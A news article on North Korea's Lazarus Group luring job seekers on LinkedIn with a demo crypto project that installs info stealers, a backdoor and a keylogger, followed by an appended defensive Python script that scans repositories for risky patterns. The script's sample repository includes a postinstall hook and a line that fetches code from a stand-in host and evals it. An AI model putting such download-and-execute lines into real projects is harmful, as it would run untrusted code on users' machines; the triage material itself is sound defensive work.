Powered by MOMENTUM MEDIA

North Korean hackers caught targeting businesses on LinkedIn

Hackers linked to the Lazarus Group have been attempting to harvest confidential information from victims via fake LinkedIn job offers.

David Hollingworth
Thu, 06 Feb 2025

The North Korean Lazarus Group has been observed using fake job offers on the popular professional network LinkedIn to trick individuals into sharing critical information and downloading malicious software.

The campaign – the group’s latest take on using various fake recruitment techniques – was only discovered when the hackers targeted exactly the wrong person: a researcher with cyber security firm Bitdefender.

The hackers begin by offering a chance to collaborate on a decentralised cryptocurrency exchange project, offering vague promises of remote work, flexibility, and good pay. Curious victims are invited into the recruitment process by sharing a CV or a link to their GitHub repository.

The hackers then share access to what appears to be a demo “minimum viable product” of the project and a document containing questions that can only be answered once the demo has been run. While the code seems to be harmless, once run, it’s capable of downloading the first of many malicious payloads onto a victim’s machine.

The first payload is a cross-platform info stealer that can collect and exfiltrate information on any cryptocurrency wallet installed on the device. Once this process is complete, the malware then runs a Python script that deploys three more malicious components, which together are capable of monitoring the machine for further cryptocurrency activity, searching for and exfiltrating a range of file types, and extracting browser logins and other device information.

More payloads are then delivered via a Tor Proxy server connected to the Lazarus Group’s command and control infrastructure. This includes creating a persistent backdoor for further data collection, another file stealer, a keylogger, and even a highly configurable crypto-miner.

According to Bitdefender, the hackers’ objectives go far beyond simply stealing personal data.

“By compromising people working in sectors such as aviation, defence, and nuclear industries, they aim to exfiltrate classified information, proprietary technologies, and corporate credentials,” Bitdefender said.

“In this case, executing the malware on enterprise devices could grant attackers access to sensitive company data, amplifying the damage.”

Bitdefender recommends being aware of red flags such as vague job descriptions, suspicious code repositories, and poor communication, such as spelling errors and a lack of corporate contact details.

“It is ideal to never execute any foreign source code on enterprise devices, and to use virtual machines, sandboxes or various online platforms when doing so on personal computers,” Bitdefender said.

“Even though this would add some overhead to the process, it would prevent any personal information from being leaked and used with malicious intent in the future.”
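As an added example (not code from Bitdefender or the article), the following Python script is the kind of pre-execution triage a defender could run over a cloned "demo project" before touching it: it flags files that combine a remote fetch with dynamic execution (the download-and-execute behaviour the article describes), npm install hooks that run code automatically, and large encoded blobs. The sample repository contents and the regex heuristics are constructed for this example.

```python
import re

# Heuristic pre-execution triage for a repository received from an unknown
# "recruiter". A hit means "read this before you run it", not "malware".
PATTERNS = {
    "remote_fetch": re.compile(
        r"\b(?:fetch\s*\(|urlopen\s*\(|requests\.(?:get|post)\s*\("
        r"|axios\.(?:get|post)\s*\()|https?://[^\s'\"]+"),
    "dynamic_exec": re.compile(
        r"\b(?:eval|exec|execSync|spawn|spawnSync|Function|os\.system"
        r"|subprocess\.(?:run|Popen|call))\s*\("),
    "encoded_blob": re.compile(
        r"b64decode|atob\s*\(|Buffer\.from\([^)]*base64"
        r"|['\"][A-Za-z0-9+/]{60,}={0,2}['\"]"),
    # npm lifecycle hooks execute automatically during `npm install`
    "install_hook": re.compile(r"\"(?:pre|post)install\"\s*:"),
}

def scan_file(path: str, text: str) -> dict[str, list[str]]:
    """Return {pattern_name: ["path:line", ...]} for one source file."""
    hits: dict[str, list[str]] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.setdefault(name, []).append(f"{path}:{lineno}")
    return hits

def triage_repo(files: dict[str, str]) -> dict[str, list[str]]:
    """Return {path: sorted findings}; a file that both fetches remote content
    and executes something dynamically is tagged 'download-and-execute'."""
    report: dict[str, list[str]] = {}
    for path, text in files.items():
        hits = scan_file(path, text)
        if not hits:
            continue
        findings = sorted(hits)
        if "remote_fetch" in hits and "dynamic_exec" in hits:
            findings.append("download-and-execute")
        report[path] = findings
    return report

# Constructed sample repository (not a real project): a harmless helper, a
# package.json with an install hook, and a setup script that fetches and evals.
SAMPLE_REPO = {
    "src/price.js": "export function fmt(x) { return x.toFixed(2); }\n",
    "package.json": '{ "name": "demo-dex", "scripts": { "postinstall": "node scripts/setup.js" } }\n',
    "scripts/setup.js": (
        "const blob = '" + "aGVsbG8" * 10 + "';\n"
        "fetch('https://example.invalid/stage1').then(r => r.text()).then(t => eval(t));\n"),
}

if __name__ == "__main__":
    for path, findings in triage_repo(SAMPLE_REPO).items():
        print(f"{path}: {', '.join(findings)}")
```

Run it against a real clone by reading each file into the `files` dict; anything it flags is a candidate for the virtual machine or sandbox Bitdefender recommends rather than the corporate laptop.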


David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
